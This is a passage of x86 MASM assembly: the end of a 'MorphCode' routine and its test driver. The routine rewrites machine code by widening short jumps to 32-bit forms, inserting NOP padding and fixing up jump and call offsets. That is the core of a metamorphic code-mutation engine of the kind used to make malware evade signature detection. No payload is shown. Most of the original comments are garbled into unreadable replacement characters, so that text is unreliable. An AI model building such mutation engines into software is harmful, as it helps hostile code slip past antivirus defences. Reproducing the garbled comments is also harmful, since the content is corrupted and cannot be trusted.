; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> EDI
mov [ecx].dwNewAddress, edi
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
; Loop 1
@_loop_1:
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; IN ESI == Current Code Offset
; OUT EAX == Instruction Length
call c_Catchy
;:::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
mov [ecx].dwOldAddress, esi
mov [ecx].dwLength, eax
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 00Fh
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> +10h <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
; <20><><EFBFBD><EFBFBD> :00000000: 74 30
; 0F +10 30 00 00 00
; <20><><EFBFBD><EFBFBD><EFBFBD>:00000000: 0F 84 30 00 00 00
cmp byte ptr [esi], 070h
jl @F
cmp byte ptr [esi], 07Fh
ja @F
push eax
mov al, 00Fh
stosb
movzx eax, byte ptr [esi]
add eax, 10h
stosd
;:::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push esi
call get_jump_address
;::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
mov [ecx].dwJumpAddress, eax
pop eax
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 00Fh XXh imm32, <20>.<2E>. <20><><EFBFBD><EFBFBD><EFBFBD> 6
; <20><><EFBFBD> XX <20> [80h..8Fh]
add dwTotalCodeSize, 6
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
jmp @_next_inst_
@@:
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>...
; JMP imm8 -> JMP imm32
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD> : 00000000: EB 33
; <20><><EFBFBD><EFBFBD><EFBFBD>: 00000000: E9 33 00 00 00
cmp byte ptr [esi], 0EBh
jne @F
push eax
mov al, 0E9h
stosb
xor eax, eax
stosd
;:::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push esi
call get_jump_address
;::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
mov [ecx].dwJumpAddress, eax
pop eax
;:::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> E9 imm32, <20>.<2E>. <20><><EFBFBD><EFBFBD><EFBFBD> 5
add dwTotalCodeSize, 5
jmp @_next_inst_
;::::::::::::::::::::::::::::::::::::
@@:
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> JMP imm32
cmp byte ptr [esi], 0E9h
jne @F
push eax
push esi
call get_jump_address
mov [ecx].dwJumpAddress, eax
pop eax
jmp @_replace_instr_
;::::::::::::::::::::::::::::::::::::
@@:
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> CALL
cmp byte ptr [esi], 0E8h
jne @F
push eax
push esi
call get_jump_address
mov [ecx].dwJumpAddress, eax
pop eax
jmp @_replace_instr_
;::::::::::::::::::::::::::::::::::::
@@:
;::::::::::::::::::::::::::::::::::::
; 00Fh XX imm32
cmp byte ptr [esi], 00Fh
jne @F
cmp byte ptr [esi + 1], 080h
jl @F
cmp byte ptr [esi + 1], 08Fh
ja @F
push eax
push esi
call get_jump_address
mov [ecx].dwJumpAddress, eax
pop eax
;::::::::::::::::::::::::::::::::::::
@@:
@_replace_instr_:
;::::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push esi
push ecx
mov ecx, eax
rep movsb
pop ecx
pop esi
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
add dwTotalCodeSize, eax
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
@_next_inst_:
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD>:
;--------------
; push eax
; pop eax
;--------------
; mov eax, eax
;--------------
; <20> <20>.<2E>.
push eax
mov al, 90h
stosb
pop eax
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> 1 (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP)
; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> dwTotalCodeSize <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(!)
add dwTotalCodeSize, 1
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
add esi, eax
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
add ecx, sizeof _OPCODE
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
mov [ecx].dwNewAddress, edi
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> int 3
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>....
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
cmp byte ptr [esi], 0CCh
jne @_loop_1
; End Loop 1
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
mov [ecx].dwOldAddress, 0
;::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::::::::::
mov ecx, pOpcodes
@_loop_2:
;::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><> dwJumpAddress != 0 (!)
cmp [ecx].dwJumpAddress, 0
je @F
;::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
push pOpcodes
push [ecx].dwJumpAddress
call get_new_jump_address
;::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>.
; <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD> EAX (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> dwCodeAddress <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
; <20> <20><><EFBFBD> 2 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :)))
cmp eax, 0
je @F
;::::::::::::::::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>
mov edx, [ecx].dwNewAddress
;:::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; 00Fh XXh imm32
cmp byte ptr [edx], 00Fh
je @_0F_XX_imm32
;:::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; JMP imm32
cmp byte ptr [edx], 0E9h
je @_XXX_imm32_
;::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD> (CALL imm32)
cmp byte ptr [edx], 0E8h
je @_XXX_imm32_
;::::::::::::::::::::::
jmp @F
;::::::::::::::::::::::::::::::::::::::
; 00Fh XXh imm32
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> imm32
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [<5B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> + 2]
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
; 00Fh 84 imm32 ; JE imm32
; 00Fh 85 imm32 ; JNE imm32
@_0F_XX_imm32:
cmp eax, [ecx].dwNewAddress
jle @_less_or_equal_1
push eax
sub eax, [ecx].dwNewAddress
sub eax, 6
mov edx, [ecx].dwNewAddress
mov dword ptr [edx + 2], eax
pop eax
jmp @F
@_less_or_equal_1:
push eax
mov edx, [ecx].dwNewAddress
sub edx, eax
neg edx
sub edx, 6
mov eax, [ecx].dwNewAddress
mov dword ptr [eax + 2], edx
pop eax
jmp @F
;:::::::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> imm32 <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JMP <20> CALL
; <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
; imm32 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [<5B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> + 1]
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
; E9 imm32
; E8 imm32
; :)
@_XXX_imm32_:
cmp eax, [ecx].dwNewAddress
jle @_less_or_equal_2
push eax
sub eax, [ecx].dwNewAddress
sub eax, 5
mov edx, [ecx].dwNewAddress
mov dword ptr [edx + 1], eax
pop eax
jmp @F
@_less_or_equal_2:
push eax
mov edx, [ecx].dwNewAddress
sub edx, eax
neg edx
sub edx, 5
mov eax, [ecx].dwNewAddress
mov dword ptr [eax + 1], edx
pop eax
jmp @F
;::::::::::::::::::::::::::::::::::::::::
@@:
;::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :)
add ecx, sizeof _OPCODE
;:::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>
; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> dwOldAddress
cmp [ecx].dwOldAddress, 0
jne @_loop_2
;::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
invoke VirtualFree, pOpcodes, NULL, MEM_RELEASE
@_exit_:
mov eax, dwTotalCodeSize
ret
MorphCode endp
.data

; Base of the output buffer that start obtains from VirtualAlloc and
; hands to MorphCode as its destination.
dwOutputBuffer      DWORD 0

; Size of the morphed output: the value MorphCode returns in eax.
dwOutputBufferSize  DWORD 0

; Receives WriteFile's bytes-written count; start only ever passes its
; address to WriteFile and never reads it back.
dwBytesWritten      DWORD 0

; Name of the raw dump of the output buffer. It is a relative path, so
; the file lands in the process's current directory.
szFileName          BYTE "morphed_code_dump_raw.bin", 0

; Text of the MessageBoxA shown by start once the dump has been written.
szComplete          BYTE "Complete! :)", 0
.code
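;-----------------------------------------------------------------------
; start -- program entry point; a test driver for MorphCode.
;   1. Allocate a 1 MiB PAGE_READWRITE buffer for the morphed output.
;   2. Run MorphCode over test_code into it; eax = size of the output.
;   3. Dump the output to szFileName (a relative name, so it is created
;      in the process's current directory).
;   4. Release the buffer and report completion with a message box.
; Exit: plain ret back to whatever called the entry point (on Win32 the
;   loader's thread-start thunk), eax = 0 on success, eax = 1 when the
;   buffer or the dump file could not be created. The buffer is released
;   on the file-creation failure path too.
; Regs: only eax is used; the file handle is parked on the stack for the
;   CloseHandle call rather than held in a callee-saved register.
;-----------------------------------------------------------------------
start:

        ;:::::::::::::::::::::::::::::::::::::::::::::::::::::
        ; 1. Output buffer.
        ; NOTE(review): MorphCode is not told this 1 MiB bound, so an
        ; output larger than the buffer would overrun it -- confirm the
        ; proc's own size handling before pointing it at a bigger input.
        invoke  VirtualAlloc, NULL, 1024*1024, MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE
        test    eax, eax
        jz      @_start_fail_                   ; no buffer: nothing safe to write into
        mov     dwOutputBuffer, eax

        ;::::::::::::::::
        ; 2. Morph test_code into the buffer; eax = bytes produced.
        invoke  MorphCode, offset test_code, dwOutputBuffer
        mov     dwOutputBufferSize, eax

        ;::::::::::::::::::::::::::::::::
        ; 3. Dump the result to disk.
        invoke  CreateFile, offset szFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, 0
        cmp     eax, INVALID_HANDLE_VALUE
        je      @_start_release_                ; could not create the file; still free the buffer
        push    eax                             ; keep the handle; stdcall CloseHandle pops it below
        ; 'offset' rather than 'addr': for a global both push the address,
        ; but 'offset' can never expand to a lea through eax, which is still
        ; live here as WriteFile's first argument.
        ; WriteFile's result is not checked; a short write only shows up as a
        ; truncated dump.
        invoke  WriteFile, eax, dwOutputBuffer, dwOutputBufferSize, offset dwBytesWritten, NULL
        call    CloseHandle                     ; consumes the handle pushed above

        ;:::::::::::::::::
        ; 4. Clean up and report.
        invoke  VirtualFree, dwOutputBuffer, NULL, MEM_RELEASE
        invoke  MessageBoxA, 0, offset szComplete, 0, MB_ICONINFORMATION

        xor     eax, eax                        ; exit code 0
        ret

@_start_release_:
        invoke  VirtualFree, dwOutputBuffer, NULL, MEM_RELEASE
@_start_fail_:
        mov     eax, 1                          ; exit code 1: allocation or file creation failed
        ret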
end start
; #########################################################################